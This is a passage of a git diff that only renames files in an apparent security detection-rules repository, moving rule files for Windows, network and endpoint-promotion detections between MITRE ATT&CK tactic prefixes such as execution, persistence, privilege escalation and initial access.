rules/network/execution_react_server_components_rce_attempt.toml rename to rules/network/initial_access_react_server_components_rce_attempt.toml diff --git a/rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml similarity index 100% rename from rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml rename to rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml diff --git a/rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml similarity index 100% rename from rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml rename to rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml diff --git a/rules/network/reconnaissance_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml similarity index 100% rename from rules/network/reconnaissance_unsecure_elasticsearch_node.toml rename to rules/network/initial_access_unsecure_elasticsearch_node.toml diff --git a/rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml similarity index 100% rename from rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml rename to rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml diff --git a/rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml similarity index 100% rename from rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml rename to rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml diff --git a/rules/promotions/defense_evasion_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml similarity index 100% rename from rules/promotions/defense_evasion_endgame_permission_theft_detected.toml rename to rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml diff --git a/rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml similarity index 100% rename from rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml rename to rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml diff --git a/rules/promotions/defense_evasion_endgame_process_injection_detected.toml b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml similarity index 100% rename from rules/promotions/defense_evasion_endgame_process_injection_detected.toml rename to rules/promotions/privilege_escalation_endgame_process_injection_detected.toml diff --git a/rules/promotions/defense_evasion_endgame_process_injection_prevented.toml b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml similarity index 100% rename from rules/promotions/defense_evasion_endgame_process_injection_prevented.toml rename to rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml diff --git a/rules/windows/persistence_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml similarity index 100% rename from rules/windows/persistence_outlook_home_page.toml rename to rules/windows/command_and_control_outlook_home_page.toml diff --git a/rules/windows/collection_adidns_wildcard.toml b/rules/windows/credential_access_adidns_wildcard.toml similarity index 100% rename from rules/windows/collection_adidns_wildcard.toml rename to rules/windows/credential_access_adidns_wildcard.toml diff --git a/rules/windows/collection_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml similarity index 100% rename from rules/windows/collection_browsers_unusual_parent.toml rename to rules/windows/credential_access_browsers_unusual_parent.toml diff --git a/rules/windows/persistence_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml similarity index 100% rename from rules/windows/persistence_dcsync_user_backdoor.toml rename to rules/windows/credential_access_dcsync_user_backdoor.toml diff --git a/rules/windows/collection_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml similarity index 100% rename from rules/windows/collection_dnsnode_creation.toml rename to rules/windows/credential_access_dnsnode_creation.toml diff --git a/rules/windows/persistence_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml similarity index 100% rename from rules/windows/persistence_lsass_loaded_susp_dll.toml rename to rules/windows/credential_access_lsass_loaded_susp_dll.toml diff --git a/rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml similarity index 100% rename from rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml rename to rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml diff --git a/rules/windows/persistence_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml similarity index 100% rename from rules/windows/persistence_shadow_credentials.toml rename to rules/windows/credential_access_shadow_credentials.toml diff --git a/rules/windows/persistence_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml similarity index 100% rename from rules/windows/persistence_spn_attribute_modified.toml rename to rules/windows/credential_access_spn_attribute_modified.toml diff --git a/rules/windows/collection_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml similarity index 100% rename from rules/windows/collection_web_config_file_access.toml rename to rules/windows/credential_access_web_config_file_access.toml diff --git a/rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml similarity index 100% rename from rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml rename to rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml diff --git a/rules/windows/command_and_control_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml similarity index 100% rename from rules/windows/command_and_control_msiexec_remote_payload.toml rename to rules/windows/defense_evasion_msiexec_remote_payload.toml diff --git a/rules/windows/persistence_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml similarity index 100% rename from rules/windows/persistence_regmod_remotemonologue.toml rename to rules/windows/defense_evasion_regmod_remotemonologue.toml diff --git a/rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml similarity index 100% rename from rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml rename to rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml diff --git a/rules/windows/command_and_control_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml similarity index 100% rename from rules/windows/command_and_control_suspicious_certutil_commands.toml rename to rules/windows/defense_evasion_suspicious_certutil_commands.toml diff --git a/rules/windows/execution_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml similarity index 100% rename from rules/windows/execution_suspicious_process_access_direct_syscall.toml rename to rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml diff --git a/rules/windows/execution_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml similarity index 100% rename from rules/windows/execution_suspicious_zoom_child_process.toml rename to rules/windows/defense_evasion_suspicious_zoom_child_process.toml diff --git a/rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml similarity index 100% rename from rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml rename to rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml diff --git a/rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml similarity index 100% rename from rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml rename to rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml diff --git a/rules/windows/execution_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml similarity index 100% rename from rules/windows/execution_wsl_bash_exec.toml rename to rules/windows/defense_evasion_wsl_bash_exec.toml diff --git a/rules/windows/defense_evasion_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml similarity index 100% rename from rules/windows/defense_evasion_com_object_xwizard.toml rename to rules/windows/execution_com_object_xwizard.toml diff --git a/rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml similarity index 100% rename from rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml rename to rules/windows/execution_command_prompt_connecting_to_the_internet.toml diff --git a/rules/windows/defense_evasion_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml similarity index 100% rename from rules/windows/defense_evasion_command_shell_via_rundll32.toml rename to rules/windows/execution_command_shell_via_rundll32.toml diff --git a/rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml similarity index 100% rename from rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml rename to rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml diff --git a/rules/windows/initial_access_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml similarity index 100% rename from rules/windows/initial_access_downloaded_shortcut_files.toml rename to rules/windows/execution_downloaded_shortcut_files.toml diff --git a/rules/windows/initial_access_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml similarity index 100% rename from rules/windows/initial_access_downloaded_url_file.toml rename to rules/windows/execution_downloaded_url_file.toml diff --git a/rules/windows/discovery_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml similarity index 100% rename from rules/windows/discovery_enumeration_via_wmiprvse.toml rename to rules/windows/execution_enumeration_via_wmiprvse.toml diff --git a/rules/windows/defense_evasion_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml similarity index 100% rename from rules/windows/defense_evasion_from_unusual_path_cmdline.toml rename to rules/windows/execution_from_unusual_path_cmdline.toml diff --git a/rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml similarity index 100% rename from rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml rename to rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml diff --git a/rules/windows/credential_access_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml similarity index 100% rename from rules/windows/credential_access_posh_hacktool_functions.toml rename to rules/windows/execution_posh_hacktool_functions.toml diff --git a/rules/windows/defense_evasion_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml similarity index 100% rename from rules/windows/defense_evasion_posh_portable_executable.toml rename to rules/windows/execution_posh_portable_executable.toml diff --git a/rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml similarity index 100% rename from rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml rename to rules/windows/execution_register_server_program_connecting_to_the_internet.toml diff --git a/rules/windows/command_and_control_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml similarity index 100% rename from rules/windows/command_and_control_revshell_cmd_via_netcat.toml rename to rules/windows/execution_revshell_cmd_via_netcat.toml diff --git a/rules/windows/command_and_control_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml similarity index 100% rename from rules/windows/command_and_control_scripting_remote_webdav.toml rename to rules/windows/execution_scripting_remote_webdav.toml diff --git a/rules/windows/persistence_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml similarity index 100% rename from rules/windows/persistence_shared_modules_local_sxs_dll.toml rename to rules/windows/execution_shared_modules_local_sxs_dll.toml diff --git a/rules/windows/defense_evasion_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml similarity index 100% rename from rules/windows/defense_evasion_suspicious_psexesvc.toml rename to rules/windows/execution_suspicious_psexesvc.toml diff --git a/rules/windows/defense_evasion_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml similarity index 100% rename from rules/windows/defense_evasion_via_compiled_html_file.toml rename to rules/windows/execution_via_compiled_html_file.toml diff --git a/rules/windows/defense_evasion_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml similarity index 100% rename from rules/windows/defense_evasion_via_hidden_shell_conhost.toml rename to rules/windows/execution_via_hidden_shell_conhost.toml diff --git a/rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml similarity index 100% rename from rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml rename to rules/windows/execution_via_mmc_console_file_unusual_path.toml diff --git a/rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml similarity index 100% rename from rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml rename to rules/windows/execution_windows_cmd_shell_susp_args.toml diff --git a/rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml similarity index 100% rename from rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml rename to rules/windows/execution_windows_fakecaptcha_cmd_ps.toml diff --git a/rules/windows/defense_evasion_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml similarity index 100% rename from rules/windows/defense_evasion_windows_powershell_susp_args.toml rename to rules/windows/execution_windows_powershell_susp_args.toml diff --git a/rules/windows/defense_evasion_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml similarity index 100% rename from rules/windows/defense_evasion_windows_script_from_internet.toml rename to rules/windows/execution_windows_script_from_internet.toml diff --git a/rules/windows/credential_access_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml similarity index 100% rename from rules/windows/credential_access_smb_rare_destination.toml rename to rules/windows/exfiltration_smb_rare_destination.toml diff --git a/rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml similarity index 100% rename from rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml rename to rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml diff --git a/rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml similarity index 100% rename from rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml rename to rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml diff --git a/rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml similarity index 100% rename from rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml rename to rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml diff --git a/rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml similarity index 100% rename from rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml rename to rules/windows/initial_access_exploit_jetbrains_teamcity.toml diff --git a/rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml similarity index 100% rename from rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml rename to rules/windows/initial_access_potential_webhelpdesk_exploit.toml diff --git a/rules/windows/execution_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml similarity index 100% rename from rules/windows/execution_rdp_file_mail_attachment.toml rename to rules/windows/initial_access_rdp_file_mail_attachment.toml diff --git a/rules/windows/execution_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml similarity index 100% rename from rules/windows/execution_script_executing_powershell.toml rename to rules/windows/initial_access_script_executing_powershell.toml diff --git a/rules/windows/execution_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml similarity index 100% rename from rules/windows/execution_scripts_process_started_via_wmi.toml rename to rules/windows/initial_access_scripts_process_started_via_wmi.toml diff --git a/rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml similarity index 100% rename from rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml rename to rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml diff --git a/rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml similarity index 100% rename from rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml rename to rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml diff --git a/rules/windows/defense_evasion_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml similarity index 100% rename from rules/windows/defense_evasion_suspicious_ms_office_child_process.toml rename to rules/windows/initial_access_suspicious_ms_office_child_process.toml diff --git a/rules/windows/execution_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml similarity index 100% rename from rules/windows/execution_suspicious_ms_outlook_child_process.toml rename to rules/windows/initial_access_suspicious_ms_outlook_child_process.toml diff --git a/rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml similarity index 100% rename from rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml rename to rules/windows/initial_access_suspicious_windows_server_update_svc.toml diff --git a/rules/windows/defense_evasion_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml similarity index 100% rename from rules/windows/defense_evasion_url_cve_2025_33053.toml rename to rules/windows/initial_access_url_cve_2025_33053.toml diff --git a/rules/windows/execution_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml similarity index 100% rename from rules/windows/execution_via_explorer_suspicious_child_parent_args.toml rename to rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml diff --git a/rules/windows/execution_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml similarity index 100% rename from rules/windows/execution_webshell_screenconnect_server.toml rename to rules/windows/initial_access_webshell_screenconnect_server.toml diff --git a/rules/windows/defense_evasion_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml similarity index 100% rename from rules/windows/defense_evasion_xsl_script_execution_via_com.toml rename to rules/windows/initial_access_xsl_script_execution_via_com.toml diff --git a/rules/windows/defense_evasion_alternate_creds_pth.toml b/rules/windows/lateral_movement_alternate_creds_pth.toml similarity index 100% rename from rules/windows/defense_evasion_alternate_creds_pth.toml rename to rules/windows/lateral_movement_alternate_creds_pth.toml diff --git a/rules/windows/execution_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml similarity index 100% rename from rules/windows/execution_cmd_service.toml rename to rules/windows/lateral_movement_cmd_service.toml diff --git a/rules/windows/defense_evasion_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml similarity index 100% rename from rules/windows/defense_evasion_dcom_mmc20.toml rename to rules/windows/lateral_movement_dcom_mmc20.toml diff --git a/rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml similarity index 100% rename from rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml rename to rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml diff --git a/rules/windows/execution_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml similarity index 100% rename from rules/windows/execution_incoming_wmi.toml rename to rules/windows/lateral_movement_incoming_wmi.toml diff --git a/rules/windows/defense_evasion_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml similarity index 100% rename from rules/windows/defense_evasion_rdp_enabled_registry.toml rename to rules/windows/lateral_movement_rdp_enabled_registry.toml diff --git a/rules/windows/execution_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml similarity index 100% rename from rules/windows/execution_remote_services.toml rename to rules/windows/lateral_movement_remote_services.toml diff --git a/rules/windows/execution_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml similarity index 100% rename from rules/windows/execution_remote_task_creation_winlog.toml rename to rules/windows/lateral_movement_remote_task_creation_winlog.toml diff --git a/rules/windows/execution_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml similarity index 100% rename from rules/windows/execution_scheduled_task_target.toml rename to rules/windows/lateral_movement_scheduled_task_target.toml diff --git a/rules/windows/initial_access_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml similarity index 100% rename from rules/windows/initial_access_unusual_dns_service_children.toml rename to rules/windows/lateral_movement_unusual_dns_service_children.toml diff --git a/rules/windows/initial_access_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml similarity index 100% rename from rules/windows/initial_access_unusual_dns_service_file_writes.toml rename to rules/windows/lateral_movement_unusual_dns_service_file_writes.toml diff --git a/rules/windows/execution_via_wsus_update.toml b/rules/windows/lateral_movement_via_wsus_update.toml similarity index 100% rename from rules/windows/execution_via_wsus_update.toml rename to rules/windows/lateral_movement_via_wsus_update.toml diff --git a/rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml similarity index 100% rename from rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml rename to rules/windows/persistence_evasion_hidden_local_account_creation.toml diff --git a/rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml similarity index 100% rename from rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml rename to rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml diff --git a/rules/windows/defense_evasion_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml similarity index 100% rename from rules/windows/defense_evasion_msi_installer_task_startup.toml rename to rules/windows/persistence_msi_installer_task_startup.toml diff --git a/rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml b/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml similarity index 100% rename from rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml rename to rules/windows/persistence_sdprop_exclusion_dsheuristics.toml diff --git a/rules/windows/defense_evasion_services_registry.toml b/rules/windows/persistence_services_registry.toml similarity index 100% rename from rules/windows/defense_evasion_services_registry.toml rename to rules/windows/persistence_services_registry.toml diff --git a/rules/windows/execution_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml similarity index 100% rename from rules/windows/execution_suspicious_scheduled_task_runtime.toml rename to rules/windows/persistence_suspicious_scheduled_task_runtime.toml diff --git a/rules/windows/execution_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml similarity index 100% rename from rules/windows/execution_system_shells_via_services.toml rename to rules/windows/persistence_system_shells_via_services.toml diff --git a/rules/windows/execution_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml similarity index 100% rename from rules/windows/execution_temp_scheduled_task.toml rename to rules/windows/persistence_temp_scheduled_task.toml diff --git a/rules/windows/defense_evasion_via_bits_job_notify_command.toml b/rules/windows/persistence_via_bits_job_notify_command.toml similarity index 100% rename from rules/windows/defense_evasion_via_bits_job_notify_command.toml rename to rules/windows/persistence_via_bits_job_notify_command.toml diff --git a/rules/windows/defense_evasion_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml similarity index 100% rename from rules/windows/defense_evasion_via_hidden_run_key_valuename.toml rename to rules/windows/persistence_via_hidden_run_key_valuename.toml diff --git a/rules/windows/execution_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml similarity index 100% rename from rules/windows/execution_via_wmi_stdregprov_run_services.toml rename to rules/windows/persistence_via_wmi_stdregprov_run_services.toml diff --git a/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml similarity index 100% rename from rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml rename to rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml diff --git a/rules/windows/execution_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml similarity index 100% rename from rules/windows/execution_webshell_detection.toml rename to rules/windows/persistence_webshell_detection.toml diff --git a/rules/windows/initial_access_account_takeover_mixed_logon_types.toml b/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml similarity index 100% rename from rules/windows/initial_access_account_takeover_mixed_logon_types.toml rename to rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml diff --git a/rules/windows/persistence_badsuccessor_dmsa_abuse.toml b/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml similarity index 100% rename from rules/windows/persistence_badsuccessor_dmsa_abuse.toml rename to rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml diff --git a/rules/windows/defense_evasion_create_process_as_different_user.toml b/rules/windows/privilege_escalation_create_process_as_different_user.toml similarity index 100% rename from rules/windows/defense_evasion_create_process_as_different_user.toml rename to rules/windows/privilege_escalation_create_process_as_different_user.toml diff --git a/rules/windows/defense_evasion_create_process_with_token_unpriv.toml b/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml similarity index 100% rename from rules/windows/defense_evasion_create_process_with_token_unpriv.toml rename to rules/windows/privilege_escalation_create_process_with_token_unpriv.toml diff --git a/rules/windows/persistence_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml similarity index 100% rename from rules/windows/persistence_credroaming_ldap.toml rename to rules/windows/privilege_escalation_credroaming_ldap.toml diff --git a/rules/windows/defense_evasion_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml similarity index 100% rename from rules/windows/defense_evasion_disable_uac_registry.toml rename to rules/windows/privilege_escalation_disable_uac_registry.toml diff --git a/rules/windows/persistence_dmsa_creation_by_unusual_user.toml b/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml similarity index 100% rename from rules/windows/persistence_dmsa_creation_by_unusual_user.toml rename to rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml diff --git a/rules/windows/persistence_dns_serverlevelplugindll.toml b/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml similarity index 100% rename from rules/windows/persistence_dns_serverlevelplugindll.toml rename to rules/windows/privilege_escalation_dns_serverlevelplugindll.toml diff --git a/rules/windows/defense_evasion_expired_driver_loaded.toml b/rules/windows/privilege_escalation_expired_driver_loaded.toml similarity index 100% rename from rules/windows/defense_evasion_expired_driver_loaded.toml rename to rules/windows/privilege_escalation_expired_driver_loaded.toml diff --git a/rules/windows/persistence_gpo_schtask_service_creation.toml b/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml similarity index 100% rename from rules/windows/persistence_gpo_schtask_service_creation.toml rename to rules/windows/privilege_escalation_gpo_schtask_service_creation.toml diff --git a/rules/windows/persistence_group_policy_iniscript.toml b/rules/windows/privilege_escalation_group_policy_iniscript.toml similarity index 100% rename from rules/windows/persistence_group_policy_iniscript.toml rename to rules/windows/privilege_escalation_group_policy_iniscript.toml diff --git a/rules/windows/execution_group_policy_scheduled_task.toml b/rules/windows/privilege_escalation_group_policy_scheduled_task.toml similarity index 100% rename from rules/windows/execution_group_policy_scheduled_task.toml rename to rules/windows/privilege_escalation_group_policy_scheduled_task.toml diff --git a/rules/windows/defense_evasion_krbrelayup_service_creation.toml b/rules/windows/privilege_escalation_krbrelayup_service_creation.toml similarity index 100% rename from rules/windows/defense_evasion_krbrelayup_service_creation.toml rename to rules/windows/privilege_escalation_krbrelayup_service_creation.toml diff --git a/rules/windows/persistence_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml similarity index 100% rename from rules/windows/persistence_lsa_auth_package.toml rename to rules/windows/privilege_escalation_lsa_auth_package.toml diff --git a/rules/windows/defense_evasion_make_token_local.toml b/rules/windows/privilege_escalation_make_token_local.toml similarity index 100% rename from rules/windows/defense_evasion_make_token_local.toml rename to rules/windows/privilege_escalation_make_token_local.toml diff --git a/rules/windows/defense_evasion_newcreds_logon_rare_process.toml b/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml similarity index 100% rename from rules/windows/defense_evasion_newcreds_logon_rare_process.toml rename to rules/windows/privilege_escalation_newcreds_logon_rare_process.toml diff --git a/rules/windows/persistence_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml similarity index 100% rename from rules/windows/persistence_port_monitor_print_processor_abuse.toml rename to rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml diff --git a/rules/windows/defense_evasion_posh_token_impersonation.toml b/rules/windows/privilege_escalation_posh_token_impersonation.toml similarity index 100% rename from rules/windows/defense_evasion_posh_token_impersonation.toml rename to rules/windows/privilege_escalation_posh_token_impersonation.toml diff --git a/rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml b/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml similarity index 100% rename from rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml rename to rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml diff --git a/rules/windows/persistence_reg_service_imagepath_mod.toml b/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml similarity index 100% rename from rules/windows/persistence_reg_service_imagepath_mod.toml rename to rules/windows/privilege_escalation_reg_service_imagepath_mod.toml diff --git a/rules/windows/execution_service_control_spawned_script_int.toml b/rules/windows/privilege_escalation_service_control_spawned_script_int.toml similarity index 100% rename from rules/windows/execution_service_control_spawned_script_int.toml rename to rules/windows/privilege_escalation_service_control_spawned_script_int.toml diff --git a/rules/windows/initial_access_takeover_new_source_ip.toml b/rules/windows/privilege_escalation_takeover_new_source_ip.toml similarity index 100% rename from rules/windows/initial_access_takeover_new_source_ip.toml rename to rules/windows/privilege_escalation_takeover_new_source_ip.toml diff --git a/rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml similarity index 100% rename from rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml rename 